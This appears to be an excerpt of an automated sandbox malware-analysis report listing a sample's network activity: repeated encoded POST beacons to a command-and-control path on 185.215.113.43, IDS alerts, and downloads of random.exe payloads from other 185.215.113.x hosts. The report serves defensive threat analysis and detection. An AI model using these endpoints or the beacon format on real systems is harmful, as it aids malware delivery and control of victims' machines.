Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 185.215.113.97 185.215.113.97

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49941 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49972 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49992 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49995 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50057 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49993 -> 23.197.127.21:443

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe

Code function: 4_2_0059E0C0 recv,recv,recv,recv,

4_2_0059E0C0

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /m08mbk HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/Cyber_Yoda/random.exe HTTP/1.1Host: 185.215.113.97
